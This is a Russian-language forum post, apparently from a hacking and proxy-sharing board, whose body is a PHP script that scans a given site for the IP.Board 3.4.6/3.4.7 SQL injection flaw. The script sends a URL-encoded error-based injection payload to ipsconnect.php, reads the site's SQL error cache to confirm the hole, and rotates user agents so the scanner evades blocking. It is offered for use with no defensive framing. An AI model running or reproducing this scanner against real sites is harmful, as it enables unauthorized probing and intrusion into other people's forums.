Ваш ключ: необходима авторизация | MyProxy - бесплатный обменник валидных прокси между пользователями форума.

IPB 3.4.6 | 3.4.7 SQLi Checker

Тема в разделе IPB, создана пользователем ERROR404, 31 окт 2015.

Войдите для ответа
  1. ERROR404 Администратор

    ERROR404
    Статус:
    Вне сети
    <?php
    if (isset($_GET['q'])) {
    
      $host = $_GET['q'];
      
      //Ensures you have http or https in your domain name
      if (substr($host, 0, 4) == "http") {
        $protocol = "http";
        if (substr($host, 0, 5) == "https") {
          $protocol = "https";
        }
        
        //Removes any trailing slashes
        if (substr($host, -1) == '/') {
          $host = substr($host, 0, -1);
        }
        
        //Initial SQL Injection check
        $newHost  = $host . '/interface/ipsconnect/ipsconnect.php';
        $sql      = 'SELECT COUNT(*) FROM members';
        $data     = "act=login&idType=id&id[]=-1&id[]=-1%29%20and%201%21%3D%22%27%22%20and%20extractvalue%281%2Cconcat%280x3a%2C%28SELECT%20COUNT%28%2A%29%20FROM%20members%29%29%29%23%27";
        $response = SendPost($newHost, $data);
        
        //Checking the SQL Error Log for confirmation
        $url      = $host . '/cache/sql_error_latest.cgi';
        $response = SendGet($url);
        if (strpos($response, "XPATH syntax error") !== false) {
          printf("%s is vulnerable to IPBoard 3.4.6 or 3.4.7 SQL Injection!", $host);
        } else {
          printf("%s is not vulnerable to IPBoard 3.4.6 or 3.4.7 SQL Injection!", $host);
        }
        return false;
      } else {
        echo "Invalid host, needs to have a protocol -> http://apples.org/path/to/forums";
      }
    } else {
      echo "I think you're lost homie.";
    }
    
    //So you cant be blocked via useragent
    function getRandomUserAgent()
    {
      $userAgents = array(
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
        "Opera/9.20 (Windows NT 6.0; U; en)",
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50",
        "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.02 [en]",
        "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.7) Gecko/20040624 Firefox/0.9",
        "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/48 (like Gecko) Safari/48"
      );
      $random     = rand(0, count($userAgents) - 1);
      return $userAgents[$random];
    }
    
    //Sends a post request
    function SendPost($site, $post)
    {
      $ch = curl_init();
      curl_setopt($ch, CURLOPT_URL, "$site");
      curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
      curl_setopt($ch, CURLOPT_USERAGENT, getRandomUserAgent());
      curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
      $response = curl_exec($ch);
      curl_close($ch);
      return $response;
    }
    
    //Sends a get request, specifically for reading the sql error cgi
    function SendGet($site)
    {
      $ch = curl_init();
      curl_setopt($ch, CURLOPT_URL, "$site");
      curl_setopt($ch, CURLOPT_USERAGENT, getRandomUserAgent());
      curl_setopt($ch, CURLOPT_HEADER, 0);
      curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
      $response = curl_exec($ch);
      curl_close($ch);
      return $response;
    }
     
    31 окт 2015 #1
Top